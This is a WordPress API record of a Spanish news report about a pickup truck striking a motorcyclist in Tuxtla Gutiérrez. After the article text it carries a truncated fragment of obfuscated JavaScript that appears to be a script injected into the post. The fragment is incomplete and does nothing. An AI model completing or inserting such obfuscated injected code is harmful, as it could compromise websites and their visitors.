{"id":20806,"date":"2025-03-08T05:08:49","date_gmt":"2025-03-08T05:08:49","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=20806"},"modified":"2025-03-08T05:08:50","modified_gmt":"2025-03-08T05:08:50","slug":"camioneta-impacta-a-motociclista-en-la-zona-oriente-de-tuxtla-2","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=20806","title":{"rendered":"Camioneta impacta a motociclista en la zona Oriente de Tuxtla"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/03\/IMG-20250307-WA0034-1024x768.jpg\" alt=\"\" class=\"wp-image-20807\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/03\/IMG-20250307-WA0034-1024x768.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/03\/IMG-20250307-WA0034-300x225.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/03\/IMG-20250307-WA0034-768x576.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/03\/IMG-20250307-WA0034.jpg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudadano, 7 de marzo del 2025. &#8211; Este viernes por la tarde el conductor de una camioneta Toyota tipo Tundra de color gris impact\u00f3 a una motocicleta Honda tipo cargo cuando circulaba a la altura de Calzada Caminera y Avenida Central de la Colonia Francisco I Madero de Tuxtla Guti\u00e9rrez.<\/p>\n\n\n\n<p>Los reportes oficiales informaron que, este hecho ocurri\u00f3 cuando la camioneta intent\u00f3 incorporarse en el carril de Norte a Sur e hizo corte de circulaci\u00f3n al caballo de acero.<\/p>\n\n\n\n<p>Por el impacto el motociclista sali\u00f3 volando y se estrell\u00f3 contra el pavimento.<\/p>\n\n\n\n<p>Al lugar arribaron param\u00e9dicos de la Cruz Roja para atender al lesionado.<\/p>\n\n\n\n<p>En el lugar el responsable se hizo cargo de los gastos mediante un seguro automotriz.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudadano, 7 de marzo del 2025. &#8211; Este viernes por la tarde el conductor de una camioneta Toyota tipo Tundra de color gris impact\u00f3 a una motocicleta Honda tipo cargo cuando circulaba a la altura de Calzada Caminera y Avenida Central de la Colonia Francisco I Madero de Tuxtla Guti\u00e9rrez. Los reportes &hellip;<\/p>\n","protected":false},"author":2,"featured_media":20807,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-20806","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/20806","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=20806"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/20806\/revisions"}],"predecessor-version":[{"id":20808,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/20806\/revisions\/20808"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/20807"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=20806"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=20806"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=20806"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}